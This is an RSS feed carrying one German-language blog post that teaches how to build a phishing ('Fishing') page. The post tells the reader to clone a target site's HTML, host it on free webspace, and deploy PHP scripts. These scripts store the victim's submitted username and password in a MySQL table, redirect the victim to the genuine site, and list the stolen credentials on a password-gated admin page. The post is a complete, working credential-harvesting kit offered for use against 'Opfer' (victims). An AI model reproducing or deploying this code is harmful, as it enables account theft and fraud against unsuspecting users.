<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Daniel Schröter&#039;s Blog &#187; fishing page</title>
	<atom:link href="http://blog.danielschroeter.de/tag/fishing-page/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.danielschroeter.de</link>
	<description>blog.danielschroeter.de</description>
	<lastBuildDate>Wed, 16 Nov 2011 11:07:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>How to create a Fishing-Page (MySQL)</title>
		<link>http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/</link>
		<comments>http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/#comments</comments>
		<pubDate>Sat, 07 Jun 2008 16:47:10 +0000</pubDate>
		<dc:creator>Daniel</dc:creator>
				<category><![CDATA[Coding]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[fishing page]]></category>
		<category><![CDATA[mysql login]]></category>
		<category><![CDATA[victim]]></category>

		<guid isPermaLink="false">http://www.danielschroeter.de/blog/?p=172</guid>
		<description><![CDATA[1. Source code von der Webseite nehmen, welcher an euren Browser geschickt wurde. (Rechtsklick -> Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern. 2. Nun haben wir ein Abbild von der Page 3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet. Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt: [...]]]></description>
			<content:encoded><![CDATA[<p>1. Source code von der Webseite nehmen, welcher an euren Browser geschickt wurde. (Rechtsklick -> Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern.<br />
2. Nun haben wir ein Abbild von der Page <img src='http://blog.danielschroeter.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet.</p>
<p>Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt:</p>
<p><strong>index.html</strong></p>
<p>das ist der Source der kopierten Seite.</p>
<p><strong>send.php</strong></p>

<div class="wp_codebox_msgheader"><span class="right"><sup><a  href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p172code5'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1725"><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code" id="p172code5"><pre class="php" style="font-family:monospace;">&lt; ?php
include (&quot;sqlconnect.php&quot;);
$username = $_POST[&quot;username&quot;];
$userpasswort = $_POST[&quot;passwort&quot;];
$eintrag = &quot;INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')&quot;;
$eintragen = mysql_query($eintrag);
?&gt;
&lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; URL=http://blablub.com&quot;&gt;
&nbsp;
&lt;/meta&gt;</pre></td></tr></table></div>

<p>Ihr ersetzt &#8220;http://blablub.com&#8221; mit der Seite des &#8220;Opfers&#8221; (nachdem die Daten abgeschickt wurden). Dort wird er Quasi nach erfolgreicher Eingabe umgeleitet.</p>
<p><strong>sqlconnect.php</strong></p>

<div class="wp_codebox_msgheader"><span class="right"><sup><a  href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p172code6'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1726"><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
</pre></td><td class="code" id="p172code6"><pre class="php" style="font-family:monospace;">&lt; ?php
$server = &quot;localhost&quot;;
$user = &quot;root&quot;;
$pwd = &quot;password&quot;;
$database = &quot;data&quot;;
mysql_connect(&quot;$server&quot;,&quot;$user&quot;,&quot;$pwd&quot;) or die (&quot;Keine Verbindung moeglich&quot;);
mysql_select_db(&quot;$database&quot;) or die (&quot;Die Datenbank existiert nicht&quot;);
?&gt;</pre></td></tr></table></div>

<p>&#8220;localhost&#8221; wird mit dem MySQL-Datenbankserver ersetzt, diesen bekommt ihr von eurem Free-Webspace Anbieter.<br />
&#8220;root&#8221; wird mit dem MySQL-Benutzernamen ersetzt. (Gibts auch von Anbieter&#8230;)<br />
&#8220;password&#8221; wird mit dem MySQL-Password ersetzt&#8230;.<br />
&#8220;data&#8221; ist mit dem Datenbanknamen zu überschreiben&#8230; (Ebenfalls Webspaceanbieter)</p>
<p><strong>make.php</strong></p>

<div class="wp_codebox_msgheader"><span class="right"><sup><a  href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p172code7'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1727"><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code" id="p172code7"><pre class="php" style="font-family:monospace;">&lt; ?php
include (&quot;sqlconnect.php&quot;);
$sql = 'CREATE TABLE `base` ('
. ' `user` VARCHAR(255) NOT NULL, '
. ' `pwd` VARCHAR(255) NOT NULL'
. ' )'
. ' ENGINE = myisam;';
$eintragen = mysql_query($sql);
echo &quot;Tabelle erstellt! Diese Datei kann nun gelöscht werden. (make.php)&quot;;
?&gt;</pre></td></tr></table></div>

<p><strong>admin.php</strong></p>

<div class="wp_codebox_msgheader"><span class="right"><sup><a  href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p172code8'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1728"><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td><td class="code" id="p172code8"><pre class="php" style="font-family:monospace;">&lt; ?php
include (&quot;sqlconnect.php&quot;);
$ident = $_POST[&quot;pw&quot;];
if (isset($ident))
{
if ($ident==&quot;deinpw&quot;)
{
&nbsp;
$abfrage = &quot;SELECT * FROM base&quot;;
$ergebnis = mysql_query($abfrage);
while($row = mysql_fetch_object($ergebnis))
{
echo &quot;ID: $row-&gt;user&quot;;
echo &quot;&amp;nbsp;&amp;nbsp;&amp;nbsp;&quot;;
echo &quot;PW: $row-&gt;pwd&quot;;
echo &quot;&lt;br /&gt;&quot;;
}
}
else
{
echo &quot;Passwort falsch! Probiers nochmal...&quot;;
}
}
else
{
echo &quot;&lt;form action=\&quot;admin.php\&quot; method=\&quot;post\&quot;&gt;&quot;;
echo &quot;&lt;input type=\&quot;text\&quot; name=\&quot;pw\&quot; size=\&quot;21\&quot; value=\&quot;pw eingeben\&quot; maxlength=\&quot;50\&quot;/&gt;&quot;;
echo &quot;&lt;/form&gt;&quot;;
}
?&gt;</pre></td></tr></table></div>

<p>anstatt &#8220;deinpw&#8221; gebt ihr ein belibiges Passwort ein.</p>
<p>Als nächstes ladet ihr die 5 Dateien auf eurem Webspace hoch und führt die &#8220;make.php&#8221; im Browser aus. Eure Seite könnt ihr über die index.html aufrufen. Die eingetragenen Daten des &#8220;Opfers&#8221; sind in der admin.php zu finden&#8230;</p>
<p>Folgende Files müssten dann auf eurem Webspace zu finden sein wenn ihr alles richtig gemacht habt.</p>
<p>index.html<br />
send.php<br />
sqlconnect.php<br />
make.php<br />
admin.php</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.danielschroeter.de/coding/how-to-create-a-fishing-page-mysql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

